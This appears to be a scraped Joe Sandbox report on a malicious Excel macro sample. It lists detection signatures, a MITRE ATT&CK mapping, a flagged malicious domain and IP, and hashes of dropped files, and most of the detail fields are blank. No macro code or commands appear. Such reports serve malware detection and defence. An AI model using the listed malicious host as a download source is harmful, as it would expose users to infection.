Analysis Report sample20210111-01.xlsm
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load | Show sources |
Source: | Author: Florian Roth: |
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: Regsvr32 Anomaly | Show sources |
Source: | Author: Florian Roth: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | File created: | Jump to behavior |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | File created: | Jump to dropped file |
System Summary: |
---|
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro: | ||
Source: | OLE, VBA macro: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE, VBA macro line: | ||
Source: | OLE, VBA macro: |
Source: | OLE indicator, VBA macros: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Thread sleep time: |
Source: | Process information queried: |
Source: | Process created: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting22 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
27% | Virustotal | Browse | ||
8% | Metadefender | Browse | ||
22% | ReversingLabs | Script-Macro.Trojan.Wacatac |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
6% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cdn.digicertcdn.com | 104.18.10.39 | true | false |
| unknown |
ppdb-legacy.man1lamongan.com | 199.59.242.150 | true | true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
199.59.242.150 | unknown | United States | 395082 | BODIS-NJUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 338158 |
Start date: | 11.01.2021 |
Start time: | 18:27:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | sample20210111-01.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal88.expl.evad.winXLSM@7/19@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
18:28:06 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
199.59.242.150 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cdn.digicertcdn.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
BODIS-NJUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 914 |
Entropy (8bit): | 7.367371959019618 |
Encrypted: | false |
SSDEEP: | 24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF |
MD5: | E4A68AC854AC5242460AFD72481B2A44 |
SHA1: | DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 |
SHA-256: | CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F |
SHA-512: | 5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.0862995200743666 |
Encrypted: | false |
SSDEEP: | 6:kKd/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:RLutWOxSW0zeYrsMlU/ |
MD5: | 0FCAC07AEFF591E1FF36221FC15993B5 |
SHA1: | 6AF4105DB3149F0580D3E8347CE34161EB9D1263 |
SHA-256: | 866EEAAF51EA184F5C6F6C26755C5F44D98B78AC37FE334267E6C41EEEBDFA1A |
SHA-512: | A4AB264BF66FC9F69430B213CBF09BDD919777E0DEC8820AA77F06AF8D3A60645C8B9C39355176C97B7B8FDCFCD40F6F28C27599B31B59533925FC1D8E1F2970 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.117051994467751 |
Encrypted: | false |
SSDEEP: | 6:kKvVwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:nVykPlE99SNxAhUegeT2 |
MD5: | 4FA401A194E5284B0318ED59396335C5 |
SHA1: | 82F0AEA431C0AC660303423D44DEC0F299C8D1E4 |
SHA-256: | 6942E5AA884492FA35293A7A7811E1228C463F90A67A883F83AB9FA64B2D07F8 |
SHA-512: | D536E1FEDB6B5392CAD3B8341B10A2B875D6945C499BA76F09486461FD7D6037BCF0CE2B74A392F92B6458AEA041914D4DA52C6DE0A07340C67EEA415EA4A97F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1408 |
Entropy (8bit): | 2.270567557934206 |
Encrypted: | false |
SSDEEP: | 12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB |
MD5: | 40550DC2F9D56285FA529159B8F2C6A5 |
SHA1: | DD81D41D283D2881BEC77E00D773C7E8C0744DA3 |
SHA-256: | DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1 |
SHA-512: | FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2653 |
Entropy (8bit): | 7.818766151665501 |
Encrypted: | false |
SSDEEP: | 48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x |
MD5: | 30D3FFA1E30B519FD9B1B839CC65C7BE |
SHA1: | 1EB0F0E160FF7440223A7FE46F08B503F03D3AFB |
SHA-256: | 89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC |
SHA-512: | 88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 16312 |
Entropy (8bit): | 3.7163402135276207 |
Encrypted: | false |
SSDEEP: | 96:4KbBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1A:4LBKzFCEuhTlyZVaPYVaJa5GG |
MD5: | 0FDF227B92A2ECDFE906E27D6C032F8A |
SHA1: | 0EB3004A2A4905A6DEAB1996B86B4328860EE777 |
SHA-256: | 11F89CB104E776E2E1077133CBBE0C568E3F4F870157534C1F489216E9328093 |
SHA-512: | B80868BD0B49AC51AFA4A3FA0BC4B0D23656AFADE3C46EB9C72224DD787F1CF7E1215563E021F59449CA97D46FF1540FC9A1F693D77783B303935DA3FCE0E061 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 56572 |
Entropy (8bit): | 7.850619347326348 |
Encrypted: | false |
SSDEEP: | 768:hnSWNrAli8zJjXl9e4JpKmyslLBti3rng54DpyNzSHOdFoKqbLNFq9z:hXUl/i434o9og540NzgO/ObLNFq9z |
MD5: | DEC0E4FC83D4C848B110DB20629C98DC |
SHA1: | 9A7EC2860D75C9984F6713A08DA3085EF6BC91AE |
SHA-256: | FB2A27AF526DF0402AA3712EC3F0E20C9704DAC783BC737C4FF46D3629D76812 |
SHA-512: | 1F430E39C5AF36D0CA40E33828EF4002D4BB6C39A891027F3F489E8ED64A72914F33EE09BD56746DA162F762121113C13CA5FE2C55F7A342DD8127ED4CB098A9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1392 |
Entropy (8bit): | 3.142934598289609 |
Encrypted: | false |
SSDEEP: | 24:pll/r8suFosnbeTl/3vXkJXHIUbcW1IP/dOZ5GjXO/CUnHBFzE:pll/QFZbkXWGlON/xBFY |
MD5: | 91CFCC4A1A09DB77E653BB2E13F9B179 |
SHA1: | 165023666DAE5D631E04A9220442E401075DB3D1 |
SHA-256: | BA228004FCDF193E308AB0545750EE259A1D20999071DF01CD8B4B3964256422 |
SHA-512: | 2FDE452FAFAB930FE87B4E633057B63D4F21FD34634D8153423467102CAB76A939694316098E5AAECFE05AAEC90632FDF5EF79E21647AF5C70162EC0693A9118 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206769656577553 |
Encrypted: | false |
SSDEEP: | 1536:cG4LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c5NNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | C5E9F5703FA359DD72FBB85355945491 |
SHA1: | 21549B782C4424D9100D4477D34847842528426E |
SHA-256: | 98870A08EBB24B9C458C0ECE3F7CDDF3089A26C83403BF653B00ABBF244FFA95 |
SHA-512: | 0AC6C3C8EF98C31CCA647277EAB1C28565ACA4F0BB02A7BFBC040594DC327D6D7BD37D601860D47823EDA5FCC11354C5C67A88EE1C2890625DA2F330DB9D7126 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 3110 |
Entropy (8bit): | 3.6796097788243274 |
Encrypted: | false |
SSDEEP: | 96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp38MkSMY3:Wl7LBNuhhgG45nv58MlMI |
MD5: | 9951D43E6E3E0625775F9777E865C7B5 |
SHA1: | 6D551E14B691ED0A9383729CDD21BE086CD055AA |
SHA-256: | 2E5E8A5064AA4428F1BD0F83AAB230604EBBC4FCAC184BDCDC22006D2E74B86D |
SHA-512: | 8CDF8C3FE9AA9116F6621F44429268639679D8A2A5784DC0EA7AE172235742C67671188DF6786256B773A65A36E738A15FD11B11BF3F4529CAD2ED8DFD38BB7D |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 51613 |
Entropy (8bit): | 7.823714360059984 |
Encrypted: | false |
SSDEEP: | 768:UAK3YYc0e76UlwEBwuOASEvIrC98rbqFqcO+hxOVPZKp42A205LEdT/C9WNJVTQY:d976UmE+uhBQrC98PGZHUnN5LaLTQDi9 |
MD5: | 138F4E0E9934BE4DA0426CB5321F0D7F |
SHA1: | 84070B3A221BFB5C0DE40209E639669583CEC8C3 |
SHA-256: | 1D254C6FD6801C024975A8EEF3575FE869C3AC88AF910C27E24DCA3957243217 |
SHA-512: | 5E69E147D8439A637A11C9B2481E0778E65DA67BF1E059FB038266990E3B0C608E2DC8BD3BFE4D187191F8D54C138663EF215073FF872A9A68255091DC7C35A9 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48075162575188 |
Encrypted: | false |
SSDEEP: | 12:85Q/k2kcLgXg/XAlCPCHaXtB8XzB/DhiUBEX+WnicvbsaRbDtZ3YilMMEpxRljKA:85dDK/XTd6jhhnEYehtDv3qNArNru/ |
MD5: | B339C286696BE14A0BFB8FB5E272DD38 |
SHA1: | F3CC42F0CD4D791395DF1E3D43223997C63E4D41 |
SHA-256: | A352E71022A6431154D763D66924E48A7411E8F285071E107CAA18D18EAACDFB |
SHA-512: | 85695DE99B0CC82045A566D3BE60B0DC43FE56ECE3B080992384C3DF51220EDEEDFFEA15E51ADEBA897996E1AE444C9A8E5FE34EA9512990A2D5B0594959B1D0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 106 |
Entropy (8bit): | 4.288085753919832 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC |
MD5: | 3A4CD3A9401D75DF179FD5850F863649 |
SHA1: | 1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB |
SHA-256: | 6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF |
SHA-512: | 31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2108 |
Entropy (8bit): | 4.5041154003832595 |
Encrypted: | false |
SSDEEP: | 48:8Vos/XT0jFxEllGxVl1NAQh2Vos/XT0jFxEllGxVl1NAQ/:8ys/XojFxjLNAQh2ys/XojFxjLNAQ/ |
MD5: | 32B7E994BF13801BEBBC3697536E86AD |
SHA1: | 0BF3648CA3A0DF2E5FF3FF1A57F3E20394314242 |
SHA-256: | 3FC1222BC12CBE95C2EFC8E5E43754912AAF46E37B1D17541FA2011FAA74F613 |
SHA-512: | 75F0D7763F12045792F8A68FF5DA3E40346814F53F7CCE1CD8EB11A0857C922A2156629B2BABA3FC8C57754DCB02596929248A9313E40F91497C0266E3C66AA9 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 56539 |
Entropy (8bit): | 7.850377009214 |
Encrypted: | false |
SSDEEP: | 1536:hXUl/i43FH4c93BUJn5r3i7ct2ObLNFqFWf:hO/dthFIdS7BO/AWf |
MD5: | 8A3A81530F27C8EA5D3597C53C57E6DE |
SHA1: | 9B7503B11FD8F95656380A3DC6B3056C8F07B7AA |
SHA-256: | 4FF01EF2F667E67A0D88688505BD1B86BA3C89F90E792DB92A73BC4D15809EBC |
SHA-512: | E271FA1D22EA3AD8FA29F73D51EDC852F6EEC7C9E9992D12351AB58E59BF9AE0F1F09B2DDBA5FAD6063DE1368B4BDEB30423A0543E9D94EFF01EFB122329C455 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
